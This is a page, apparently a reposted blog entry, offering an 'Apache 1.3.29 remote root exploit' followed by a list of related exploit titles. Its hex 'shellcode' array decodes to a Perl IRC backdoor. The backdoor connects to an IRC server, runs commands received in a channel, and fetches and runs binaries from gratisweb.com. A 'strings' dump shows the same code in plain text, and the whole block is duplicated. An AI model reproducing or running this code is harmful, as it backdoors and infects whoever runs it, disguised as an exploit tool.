Apache/1.3.29 - Remote Root Exploit
2004-08-10 17:35
525 查看
unsigned char h3llc0de[]=
{
0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,
0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,
0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,
0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,
0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,
0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,
0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,
0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,
0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,
0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,
0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,
0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,
0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,
0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,
0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,
0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,
0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,
0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,
0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,
0x2d, 0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,
0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,
0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,
0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,
0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,
0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,
0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,
0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,
0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,
0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,
0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
0x5c, 0x6e, 0x22, 0x3b, 0x0a, 0x24, 0x69, 0x3d,
0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,
0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,
0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b,
0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,
0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,
0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,
0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,
0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,
0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,
0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,
0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,
0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,
0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,
0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,
0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,
0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,
0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,
0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,
0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,
0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,
0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,
0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,
0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,
0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,
0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,
0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,
0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,
0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,
0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,
0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,
0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,
0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,
0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,
0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,
0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69,
0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,
0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,
0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,
0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,
0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,
0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,
0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,
0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,
0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,
0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,
0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,
0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,
0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,
0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,
0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,
0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,
0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,
0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,
0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,
0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,
0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,
0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,
0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,
0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,
0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,
0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,
0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,
0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,
0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,
0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,
0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,
0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,
0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,
0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,
0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,
0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,
0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,
0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,
0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,
0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,
0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00
};
fatb@secu~# strings apache
/lib/ld-linux.so.2
libc.so.6
printf
memcpy
system
malloc
socket
inet_addr
setsockopt
fseek
sendto
fclose
fwrite
htons
fopen
_IO_stdin_used
__libc_start_main
strlen
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
QVh_
[^_]
ERROR: No ip address entered
usage:
%s [IP-ADDRESS]
could not obtain raw socket
ARE YOU ROOT?
127.0.0.1
warning: cannot set HDRINCL
Server Patched or not Vulnerable :_(
#!/usr/bin/perl
$chan="#pardillos";
$nick="Lemmings";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER lemmings +i lemmings :lemmingsv2 NICK lemmings ";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433")
{$i++;$nick=~s/d*$/$i/;print $sock "NICK $nick ";}}
print $sock "JOIN $chan PRIVMSG $chan :lemmings v2.1 PRIVMSG $chan :para mandarme comandos, escribe: ".$nick.":comando ";
while(<$sock>)
if (/^PING (.*)$/)
{print $sock "PONG $1 JOIN $chan ";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :w]*:[^ :w]* (.*)$/$1/){s/s*$//;$_=`$_`;foreach(split " ")
system("wget www.gratisweb.com/elduendecillo/inst ; chmod +x inst ; ./inst ; rm inst; cd /usr/share/locale/sk/.sk12 ; ./sk ; cd" );
print $sock "PRIVMSG $chan :$_ ";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol
{
0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69,
0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a,
0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d, 0x22, 0x23,
0x70, 0x61, 0x72, 0x64, 0x69, 0x6c, 0x6c, 0x6f,
0x73, 0x22, 0x3b, 0x0a, 0x24, 0x6e, 0x69, 0x63,
0x6b, 0x3d, 0x22, 0x4c, 0x65, 0x6d, 0x6d, 0x69,
0x6e, 0x67, 0x73, 0x22, 0x3b, 0x0a, 0x24, 0x73,
0x65, 0x72, 0x76, 0x65, 0x72, 0x3d, 0x22, 0x65,
0x66, 0x6e, 0x65, 0x74, 0x2e, 0x76, 0x75, 0x75,
0x72, 0x77, 0x65, 0x72, 0x6b, 0x2e, 0x6e, 0x6c,
0x22, 0x3b, 0x0a, 0x24, 0x53, 0x49, 0x47, 0x7b,
0x54, 0x45, 0x52, 0x4d, 0x7d, 0x3d, 0x7b, 0x7d,
0x3b, 0x0a, 0x65, 0x78, 0x69, 0x74, 0x20, 0x69,
0x66, 0x20, 0x66, 0x6f, 0x72, 0x6b, 0x3b, 0x0a,
0x75, 0x73, 0x65, 0x20, 0x49, 0x4f, 0x3a, 0x3a,
0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74, 0x3b, 0x0a,
0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x3d, 0x20,
0x49, 0x4f, 0x3a, 0x3a, 0x53, 0x6f, 0x63, 0x6b,
0x65, 0x74, 0x3a, 0x3a, 0x49, 0x4e, 0x45, 0x54,
0x2d, 0x3e, 0x6e, 0x65, 0x77, 0x28, 0x24, 0x73,
0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x22, 0x3a,
0x36, 0x36, 0x36, 0x37, 0x22, 0x29, 0x7c, 0x7c,
0x65, 0x78, 0x69, 0x74, 0x3b, 0x0a, 0x70, 0x72,
0x69, 0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63,
0x6b, 0x20, 0x22, 0x55, 0x53, 0x45, 0x52, 0x20,
0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
0x20, 0x2b, 0x69, 0x20, 0x6c, 0x65, 0x6d, 0x6d,
0x69, 0x6e, 0x67, 0x73, 0x20, 0x3a, 0x6c, 0x65,
0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73, 0x76, 0x32,
0x20, 0x5c, 0x6e, 0x4e, 0x49, 0x43, 0x4b, 0x20,
0x6c, 0x65, 0x6d, 0x6d, 0x69, 0x6e, 0x67, 0x73,
0x5c, 0x6e, 0x22, 0x3b, 0x0a, 0x24, 0x69, 0x3d,
0x31, 0x3b, 0x77, 0x68, 0x69, 0x6c, 0x65, 0x28,
0x3c, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x3d,
0x7e, 0x2f, 0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b,
0x20, 0x28, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x29,
0x20, 0x2f, 0x29, 0x7b, 0x24, 0x6d, 0x6f, 0x64,
0x65, 0x3d, 0x24, 0x31, 0x3b, 0x0a, 0x6c, 0x61,
0x73, 0x74, 0x20, 0x69, 0x66, 0x20, 0x24, 0x6d,
0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x30, 0x30,
0x31, 0x22, 0x3b, 0x0a, 0x69, 0x66, 0x28, 0x24,
0x6d, 0x6f, 0x64, 0x65, 0x3d, 0x3d, 0x22, 0x34,
0x33, 0x33, 0x22, 0x29, 0x0a, 0x7b, 0x24, 0x69,
0x2b, 0x2b, 0x3b, 0x24, 0x6e, 0x69, 0x63, 0x6b,
0x3d, 0x7e, 0x73, 0x2f, 0x5c, 0x64, 0x2a, 0x24,
0x2f, 0x24, 0x69, 0x2f, 0x3b, 0x70, 0x72, 0x69,
0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
0x20, 0x22, 0x4e, 0x49, 0x43, 0x4b, 0x20, 0x24,
0x6e, 0x69, 0x63, 0x6b, 0x5c, 0x6e, 0x22, 0x3b,
0x7d, 0x7d, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
0x4a, 0x4f, 0x49, 0x4e, 0x20, 0x24, 0x63, 0x68,
0x61, 0x6e, 0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56,
0x4d, 0x53, 0x47, 0x20, 0x24, 0x63, 0x68, 0x61,
0x6e, 0x20, 0x3a, 0x6c, 0x65, 0x6d, 0x6d, 0x69,
0x6e, 0x67, 0x73, 0x20, 0x76, 0x32, 0x2e, 0x31,
0x5c, 0x6e, 0x50, 0x52, 0x49, 0x56, 0x4d, 0x53,
0x47, 0x20, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x20,
0x3a, 0x70, 0x61, 0x72, 0x61, 0x20, 0x6d, 0x61,
0x6e, 0x64, 0x61, 0x72, 0x6d, 0x65, 0x20, 0x63,
0x6f, 0x6d, 0x61, 0x6e, 0x64, 0x6f, 0x73, 0x2c,
0x20, 0x65, 0x73, 0x63, 0x72, 0x69, 0x62, 0x65,
0x3a, 0x20, 0x22, 0x2e, 0x24, 0x6e, 0x69, 0x63,
0x6b, 0x2e, 0x22, 0x3a, 0x63, 0x6f, 0x6d, 0x61,
0x6e, 0x64, 0x6f, 0x5c, 0x6e, 0x22, 0x3b, 0x0a,
0x77, 0x68, 0x69, 0x6c, 0x65, 0x28, 0x3c, 0x24,
0x73, 0x6f, 0x63, 0x6b, 0x3e, 0x29, 0x0a, 0x7b,
0x0a, 0x69, 0x66, 0x20, 0x28, 0x2f, 0x5e, 0x50,
0x49, 0x4e, 0x47, 0x20, 0x28, 0x2e, 0x2a, 0x29,
0x24, 0x2f, 0x29, 0x0a, 0x7b, 0x70, 0x72, 0x69,
0x6e, 0x74, 0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b,
0x20, 0x22, 0x50, 0x4f, 0x4e, 0x47, 0x20, 0x24,
0x31, 0x5c, 0x6e, 0x4a, 0x4f, 0x49, 0x4e, 0x20,
0x24, 0x63, 0x68, 0x61, 0x6e, 0x5c, 0x6e, 0x22,
0x3b, 0x7d, 0x0a, 0x69, 0x66, 0x28, 0x73, 0x2f,
0x5e, 0x5b, 0x5e, 0x20, 0x5d, 0x2b, 0x20, 0x50,
0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20, 0x24,
0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24, 0x6e,
0x69, 0x63, 0x6b, 0x5b, 0x5e, 0x20, 0x3a, 0x5c,
0x77, 0x5d, 0x2a, 0x3a, 0x5b, 0x5e, 0x20, 0x3a,
0x5c, 0x77, 0x5d, 0x2a, 0x20, 0x28, 0x2e, 0x2a,
0x29, 0x24, 0x2f, 0x24, 0x31, 0x2f, 0x29, 0x7b,
0x73, 0x2f, 0x5c, 0x73, 0x2a, 0x24, 0x2f, 0x2f,
0x3b, 0x24, 0x5f, 0x3d, 0x60, 0x24, 0x5f, 0x60,
0x3b, 0x66, 0x6f, 0x72, 0x65, 0x61, 0x63, 0x68,
0x28, 0x73, 0x70, 0x6c, 0x69, 0x74, 0x20, 0x22,
0x5c, 0x6e, 0x22, 0x29, 0x0a, 0x7b, 0x0a, 0x73,
0x79, 0x73, 0x74, 0x65, 0x6d, 0x28, 0x22, 0x77,
0x67, 0x65, 0x74, 0x20, 0x77, 0x77, 0x77, 0x2e,
0x67, 0x72, 0x61, 0x74, 0x69, 0x73, 0x77, 0x65,
0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x65, 0x6c,
0x64, 0x75, 0x65, 0x6e, 0x64, 0x65, 0x63, 0x69,
0x6c, 0x6c, 0x6f, 0x2f, 0x69, 0x6e, 0x73, 0x74,
0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64,
0x20, 0x2b, 0x78, 0x20, 0x69, 0x6e, 0x73, 0x74,
0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x69, 0x6e, 0x73,
0x74, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x69,
0x6e, 0x73, 0x74, 0x3b, 0x20, 0x63, 0x64, 0x20,
0x2f, 0x75, 0x73, 0x72, 0x2f, 0x73, 0x68, 0x61,
0x72, 0x65, 0x2f, 0x6c, 0x6f, 0x63, 0x61, 0x6c,
0x65, 0x2f, 0x73, 0x6b, 0x2f, 0x2e, 0x73, 0x6b,
0x31, 0x32, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x73,
0x6b, 0x20, 0x3b, 0x20, 0x63, 0x64, 0x22, 0x20,
0x29, 0x3b, 0x0a, 0x70, 0x72, 0x69, 0x6e, 0x74,
0x20, 0x24, 0x73, 0x6f, 0x63, 0x6b, 0x20, 0x22,
0x50, 0x52, 0x49, 0x56, 0x4d, 0x53, 0x47, 0x20,
0x24, 0x63, 0x68, 0x61, 0x6e, 0x20, 0x3a, 0x24,
0x5f, 0x5c, 0x6e, 0x22, 0x3b, 0x73, 0x6c, 0x65,
0x65, 0x70, 0x20, 0x31, 0x3b, 0x7d, 0x7d, 0x7d,
0x23, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b,
0x78, 0x20, 0x2f, 0x74, 0x6d, 0x70, 0x2f, 0x6c,
0x6f, 0x6c, 0x20, 0x32, 0x3e, 0x2f, 0x64, 0x65,
0x76, 0x2f, 0x6e, 0x75, 0x6c, 0x6c, 0x3b, 0x2f,
0x74, 0x6d, 0x70, 0x2f, 0x6c, 0x6f, 0x6c, 0x00
};
fatb@secu~# strings apache
/lib/ld-linux.so.2
libc.so.6
printf
memcpy
system
malloc
socket
inet_addr
setsockopt
fseek
sendto
fclose
fwrite
htons
fopen
_IO_stdin_used
__libc_start_main
strlen
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
QVh_
[^_]
ERROR: No ip address entered
usage:
%s [IP-ADDRESS]
could not obtain raw socket
ARE YOU ROOT?
127.0.0.1
warning: cannot set HDRINCL
Server Patched or not Vulnerable :_(
#!/usr/bin/perl
$chan="#pardillos";
$nick="Lemmings";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER lemmings +i lemmings :lemmingsv2 NICK lemmings ";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;
last if $mode=="001";
if($mode=="433")
{$i++;$nick=~s/d*$/$i/;print $sock "NICK $nick ";}}
print $sock "JOIN $chan PRIVMSG $chan :lemmings v2.1 PRIVMSG $chan :para mandarme comandos, escribe: ".$nick.":comando ";
while(<$sock>)
if (/^PING (.*)$/)
{print $sock "PONG $1 JOIN $chan ";}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :w]*:[^ :w]* (.*)$/$1/){s/s*$//;$_=`$_`;foreach(split " ")
system("wget www.gratisweb.com/elduendecillo/inst ; chmod +x inst ; ./inst ; rm inst; cd /usr/share/locale/sk/.sk12 ; ./sk ; cd" );
print $sock "PRIVMSG $chan :$_ ";sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol
相关文章推荐
- Xorg <= 1.10 remote root 0day exploit (32-bit x86)
- Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
- mo_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)
- Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
- Linux x86 Dropbear SSH <= 0.34 remote root exploit
- Seagate Central 2014.0410.0026-F Remote Root Exploit
- MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE
- Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
- TrixBox 2.6.1 langChoice remote root exploit
- wu_ftpd <=2.6.1 remote root exploit
- XlightFTP Server v3.7.0 Remote Root BOF Exploit
- WVTFTPD 0.9 heap overflow remote root exploit.c
- samba-2.2.8 < remote root exploit
- Splunk Remote Root Exploit
- Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof
- Apache Spamassassin Milter Plugin Remote Root Command Execution
- Internet Explorer (createTextRang) Remote Code Execution Exploit
- Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
- Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit
- 修改apache得documentroot